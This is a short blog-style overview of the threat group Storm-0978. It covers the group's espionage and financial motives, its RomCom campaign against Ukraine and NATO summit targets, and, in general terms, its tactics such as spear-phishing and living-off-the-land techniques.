Storm-0978, this Advanced Persistent Threat (APT) group has been linked to a series of high-profile cyber-espionage campaigns. But who are they, and what are their motives? Let’s delve into the storm.
The Identity of Storm-0978
Storm-0978, as it’s known in the cybersecurity community, is a highly sophisticated APT group. Its origins are still a subject of ongoing investigation, but the group’s tactics, techniques, and procedures (TTPs) suggest a well-funded and organized entity.
Microsoft’s Threat Intelligence Center (MSTIC) has been tracking Storm-0978’s activities and has noted the group’s penchant for dual-purpose attacks. These attacks are designed not only to steal sensitive information but also to disrupt operations and cause financial damage.
The Motives: Espionage and Financial Gain
Storm-0978’s motives appear to be twofold. On one hand, they are engaged in cyber espionage, targeting specific industries and organizations to gather intelligence. On the other hand, they are also driven by financial gain, as evidenced by their attacks on financial institutions and cryptocurrency exchanges.
One of the group’s most notable campaigns targeted Ukraine and NATO membership talks at the NATO summit. This operation, dubbed “RomCom” by BlackBerry researchers, was a clear demonstration of the group’s espionage capabilities. The attackers used spear-phishing emails to trick their targets into revealing sensitive information, a tactic that is a hallmark of APT groups.
The Tactics: A Blend of Old and New
Storm-0978’s modus operandi is a blend of traditional and innovative tactics. They use spear-phishing emails, watering hole attacks, and exploit kits to gain initial access to their targets. Once inside, they deploy custom malware to maintain persistence and move laterally within the network.
One of the group’s unique traits is their use of living-off-the-land (LOTL) techniques. They leverage legitimate tools and processes already present in the victim’s environment to avoid detection and blend in with normal network activity.